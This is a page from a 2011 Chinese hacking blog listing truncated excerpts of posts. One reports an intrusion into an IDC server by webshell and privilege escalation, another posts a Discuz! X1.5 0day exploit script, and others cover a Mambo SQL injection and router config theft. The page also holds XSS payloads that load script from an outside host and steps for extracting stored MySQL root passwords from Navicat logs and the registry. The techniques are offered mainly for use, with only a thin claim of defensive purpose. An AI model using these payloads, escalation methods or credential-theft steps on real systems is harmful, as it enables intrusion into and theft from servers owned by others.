检测某IDC服务器 从入侵提权谈主机防御

分类:安全 | 2011-08-16 | 撸过 759 次
0人扯谈

文章作者:过客

前言:记录一次检测网站拿下服务器的检测报告。写出此文仅供参考,以便更好的防范入侵

 目标服务器:Windows2003+iis6+php+mysql+mssql+serv-u
目标网站:Ecshop2.7x

提权
通常步骤
1、 上传asp webshell检测可用组件,端口,目录。
2、 上传aspx webhsell 测试执行命令,获取进程、服务、端口信息

 入手

Echop2.7x暴过几个注入,很容易取到后台登录密码。
这个利用方法百度都有,不在一一描述。
后台Getshell,也有很多方法。这里用到模块管理-库项目管理-选择myship.lbi里插入<[......]

继续阅读

2011黑帽大会:由黑客操控的世界

分类:新闻 | 2011-08-16 | 撸过 605 次
0人扯谈

7 月30日至8月4日,一年一度的黑帽大会在拉斯维加斯召开。黑帽大会一直被公认为是信息安全领域的顶级盛会,在预测与描述未来信息安全形势的能力方面,它的权威性更是独一无二的。本届黑帽大会依旧没有让参与者与围观者失望,它再次汇聚了来自世界各地的企业、政府、学术界及“地下”信息安全组织的思想领袖。在这个专业与技术水平极高的平台上,黑客们正在向人们展示操控世界的技术。你的房子可能被攻破

植物大战僵尸不仅仅是游戏,如今我们家庭中的网络就如同弱不禁风的植物,而屋外,很多僵尸正在游荡,并随时可能破门而入。研究员Dave Kennedy和Rob Simon 展示了他们如何利用公共电源线破坏并暗中监视一个住[......]

继续阅读

流氓软件,病毒木马瞄上安卓平台

分类:新闻 | 2011-08-15 | 撸过 578 次
0人扯谈

近日,很多购买水货安卓手机的用户会发现,当手机到手后,已经装了很多形形色色的软件。

但是比如手机qq,uc浏览器之类的,不能删除,也不能升级,这都还好,要命的是还有大

量的不明来路的软件,悄悄在后台运行,不仅非常耗电,甚至让电池极度的发热。

而这一切问题的根源,则全部由当前火热的手机系统——android系统引起。根据调查数据显示

,在亚洲市场,Android的市场份额已经超越了Symbian,成为第一大智能系统。毫无疑问,

Android已经成为移动互联网市场上绝对的新宠,很多软件公司也因此瞄准了这个当红势头,

集体发力。流氓软件之所以将矛头对准Android平台,也与Andro[......]

继续阅读

Discuz! X1.5爆0day漏洞 建议升级2.0版本

分类:安全 | 2011-08-15 | 撸过 4,321 次
0人扯谈

近日,网络上开始流传一个影响到Discuz! X1.5的0day漏洞,据说利用此漏洞可以上传php木马。建议Discuz! X1.5升级2.0版本。

以下为黑客公布的Discuz! X1.5 0day 利用方法:

 

 

把下面内容保存为exp.php   在php环境下运行 php exp.php

<?php

print_r('

+---------------------------------------------------------------------------+

Discuz! X1-1.5 notify_credi[......]

继续阅读

backtrack常用渗透命令

分类:安全 | 2011-08-14 | 撸过 737 次
1人扯谈

whois 域名/ip 查看域名的详细信息。
ping 域名/ip 测试本机到远端主机是否联通。
dig 域名/ip 查看域名解析的详细信息。
host -l 域名 dns服务器 传输zone。
查询信息的网站:
http://centralops.net
http://www.dnsstuff.com
http://serversniff.net
http://news.netcraft.com

扫描
nmap:
-sS 半开扫描TCP和SYN扫描。
-sT 完全TCP连接扫描。
-sU UDP扫描
-PS syn包探测(防火墙探测)
-PA ack包探测(防火墙探测)
-PN 不ping[......]

继续阅读

Mambo CMS 4.6.x (4.6.5) SQL注射缺陷及修复

分类:安全 | 2011-08-14 | 撸过 1,148 次
1人扯谈

=========================================
Mambo CMS 4.6.x (4.6.5) | SQL Injection
=========================================

1.概述

Mambo CMS 4.6.5及更低版本含注射缺陷

2. 背景

Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corpo[......]

继续阅读

77种XSS跨站脚本攻击

分类:安全 | 2011-08-14 | 撸过 1,391 次
0人扯谈

1)普通的XSS JavaScript注入
<script type="text/javascript" src="https://webshell.cc/XSS/xss.js"></script>

(2)IMG标签XSS使用JavaScript命令
<script type="text/javascript" src="https://webshell.cc/XSS/xss.js"></script>

(3)IMG标签无分号无引号
<img src="javascript:alert(‘XSS’)" alt="" />

(4)IM[......]

继续阅读

突破ACL表过滤进行提权

分类:安全 | 2011-08-13 | 撸过 531 次
0人扯谈

一日从朋友处得到一网站权限,让我帮忙提权。拿到后看了看,C、D盘有只读权限,C:\Documents and Settings\All Users\Documents 可写。 没有装FTP软件和数据库。wscript.shell没有被禁用, 终端端口被改成45678 。试了试从外网连不上45678端口,用LCX也导不出来,本以为是WINDOWS自带的防火墙或者IPSEC。不过防火墙的事拿到系统权限了再搞吧。

找了找本地溢出的漏洞,貌似只有MS08067和MS10048,不过在服务器的D盘根目录发现个KB958644.exe ,这个应该是MS08067的补丁,把MS10048.exe传到C:\[......]

继续阅读

渗透底层路由技术 渗透底层路由简化入侵过程

分类:安全 | 2011-08-13 | 撸过 897 次
0人扯谈

掌握扫描底层路由可以大大方便入侵内网,如企业,公司,学校等等。。若深入透彻技术可以截取敏感信息,简化了入侵过程,而获得路由特权的话,可以制为代理跳板,仿伪攻击等。可以说这是一种"高水平"的黑客技术手段。

    首先,我们要准备的东西:"SolarWinds.Engineers.Toolset"。

图1

  我们先来打开Cisco Tools里的"IP Network browser"输入我们要扫描的IP段,来确定是否具有漏洞。

若是扫描出来,就会显示特殊标志的。

  扫描出来后,我们要利用CISCOTools的ConfigDownload下载路由的config文件。

点后,我们[......]

继续阅读

利用navicat提权

分类:安全 | 2011-08-13 | 撸过 1,022 次
0人扯谈

navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到
有两个方法提权: .
1、从日志文件里找密码,navicat会把操作日志(比如加账户)保存到C:\My Documents\Navicat\MySQLlogs下的LogHistory.txt,低版本是安装目录下的logs下LogHistory.txt
2、navicat管理的MySQL服务器信息(一般是root帐户)是存在注册表里的,具体是HKEY_CURRENT_USER\Software\PremiumSoft\NavicatServers下,导出注册表导入到本机然后星号察看就OK了。。

作者不祥,所以未有版[......]

继续阅读

第 10 页,共 14 页« 最新...89101112...最旧 »